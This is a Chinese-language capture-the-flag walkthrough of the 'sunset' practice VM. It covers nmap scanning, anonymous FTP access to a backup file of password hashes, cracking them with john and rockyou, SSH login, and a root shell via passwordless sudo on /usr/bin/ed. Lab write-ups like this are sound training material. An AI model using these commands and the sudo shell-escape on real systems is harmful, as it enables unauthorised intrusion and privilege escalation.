sunset靶機滲透,該靶機就是純主機滲透,比較簡單,適合新手練習
本垃圾現在轉向工控安全領域繼續學習,後續將推出團隊或者個人的公衆號,希望大家關注
靶機IP:192.168.56.101
信息收集
nmap全掃
nmap -sS -Pn -A -p- -n 192.168.56.101
就只有21和22兩個端口服務開發,21的FTP還能匿名登錄,上去看看
匿名登錄FTP
ftp 192.168.56.101
anonymous
發現一個備份文件backup,down下來看看
CREDENTIALS:
office:$6$$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.
datacenter:$6$$3QW/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/
sky:$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/
這些都是證書,直接上john解一下
john解
將上述的hash保存爲sunset,直接一起john解
john sunset
john解了好久,乾脆跑字典
john --wordlist=rockyou.txt sunset
最後密碼爲:cheer14
登錄提權
ssh [email protected]
cheer14
登錄上去後,發現了 user.txt
5b5b8e9b01ef27a1cc0a2d5fa87d7190
不知道什麼東西,解不出啦
查看下權限
sudo -l
發現有root權限免密執行/usr/bin/ed,用來提權
提權
執行試試
sudo /usr/bin/ed
並沒有什麼
查看下可執行的二進制文件並沒有什麼發現
隨手試了試
sudo /usr/bin/ed
!/bin/bash
直接拿到root權限
直接拿flag
25d7ce0ee3cbf71efbac61f85d0c14fe
靶機百度雲下載
鏈接:https://pan.baidu.com/s/1fjlXw2JoSKRjBWcqhWQ11A
提取碼:anr0